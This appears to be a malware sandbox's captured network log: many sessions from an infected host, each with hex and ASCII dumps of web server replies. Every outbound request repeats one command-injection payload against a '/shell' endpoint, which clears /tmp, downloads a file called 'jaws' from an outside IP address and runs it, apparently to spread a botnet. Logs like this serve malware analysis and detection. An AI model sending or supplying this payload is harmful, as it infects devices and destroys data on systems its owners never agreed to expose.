                                                          Data Ascii: <html> <head><title>400 Bad Request</title></head> <body bgcolor="#FFFFFF" text="#000000" link="#2020ff" vlink="#4040cc"> <h2>400 Bad Request</h2>Your request has bad syntax or is inherently impossible to satisfy.<div style="display:none"><ajax_response_xml_root><IF_ERRORSTR>SessionTimeout</IF_ERRORSTR><IF_ERRORPARAM>SUCC</IF_ERRORPARAM><IF_ERRORTYPE>SUCC</IF_ERRORTYPE></ajax_response_xml_root><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its
                                                          Jan 2, 2024 06:24:19.531976938 CET156INData Raw: 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61
                                                          Data Ascii: own canned one.</span><span>Padding so that MSIE deigns to show this error instead of its own canned one.</span></div><hr /></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          209192.168.2.2346902205.164.12.22280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:20.042563915 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          210192.168.2.236055494.237.51.5280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:20.104130030 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:20.329721928 CET338INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 02 Jan 2024 05:24:09 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          211192.168.2.23329582.136.180.9180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:20.174770117 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          212192.168.2.234404013.249.87.5480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:23.621355057 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.365310907 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.507050991 CET316INHTTP/1.1 403 Forbidden
                                                          Server: CloudFront
                                                          Date: Tue, 02 Jan 2024 05:24:24 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 151
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          213192.168.2.2333056167.73.14.8880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:23.650284052 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          214192.168.2.2349862104.230.152.22580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:23.652013063 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:23.827636957 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close
                                                          Jan 2, 2024 06:24:24.702987909 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close
                                                          Jan 2, 2024 06:24:25.750371933 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close
                                                          Jan 2, 2024 06:24:27.846327066 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close
                                                          Jan 2, 2024 06:24:32.046915054 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close
                                                          Jan 2, 2024 06:24:40.430231094 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          215192.168.2.233748050.87.38.1780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:23.653877974 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:23.808329105 CET554INHTTP/1.1 301 Moved Permanently
                                                          Date: Tue, 02 Jan 2024 05:24:23 GMT
                                                          Server: Apache
                                                          Location: http://www.seattlecharterbus.com/400.shtml
                                                          Cache-Control: max-age=0
                                                          Expires: Tue, 02 Jan 2024 05:24:23 GMT
                                                          Content-Length: 250
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 74 74 6c 65 63 68 61 72 74 65 72 62 75 73 2e 63 6f 6d 2f 34 30 30 2e 73 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.seattlecharterbus.com/400.shtml">here</a>.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          216192.168.2.234397820.72.240.21280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:23.654334068 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          217192.168.2.2333828212.109.194.4380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:23.748096943 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.018696070 CET354INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.14.0 (Ubuntu)
                                                          Date: Tue, 02 Jan 2024 05:24:23 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 178
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          218192.168.2.2347210218.35.171.23080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:23.810086012 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.148657084 CET500INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:23 GMT
                                                          Server: Apache
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Length: 293
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 61 6d 65 65 6e 2e 63 6f 6d 2e 74 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at www.dameen.com.tw Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          219192.168.2.2354220173.224.201.17580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:23.810709000 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:23.971647024 CET214INHTTP/1.1 301 Moved Permanently
                                                          Location: https://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+%20157.90.250.90/jaws;sh+/tmp/jaws
                                                          Content-Length: 0
                                                          Date: Tue, 02 Jan 2024 05:24:23 GMT
                                                          Server: airCube


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          220192.168.2.2346658199.232.239.4880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:23.868551970 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:23.989336014 CET167INHTTP/1.1 400 Bad Request
                                                          Connection: close
                                                          Content-Length: 11
                                                          content-type: text/plain; charset=utf-8
                                                          x-served-by: cache-dfw-kdfw8210064
                                                          Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                          Data Ascii: Bad Request


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          221192.168.2.2338188170.61.215.22480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:23.937077045 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.525281906 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:25.677232981 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          222192.168.2.233747682.163.53.1580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:23.976596117 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.205358028 CET430INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:24 GMT
                                                          Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          223192.168.2.2351516217.160.215.20580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:23.994544029 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          224192.168.2.2358620212.40.8.18780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:23.995467901 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.243223906 CET433INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:24 GMT
                                                          Server: Apache/2.4.28 (Unix) LibreSSL/2.2.7
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          225192.168.2.2345582142.58.40.15480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:23.995842934 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          226192.168.2.235479871.80.219.1580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:23.996859074 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          227192.168.2.235299854.150.52.14080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:24.012269974 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.276654959 CET322INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:24 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          228192.168.2.2345770185.204.186.16280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:24.014425039 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.282252073 CET364INHTTP/1.1 505 HTTP Version not supported
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 140
                                                          Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          229192.168.2.235916085.50.165.3780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:24.106651068 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:24.344746113 CET507INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:24 GMT
                                                          Server: Apache/2.4.38 (Raspbian)
                                                          Content-Length: 311
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
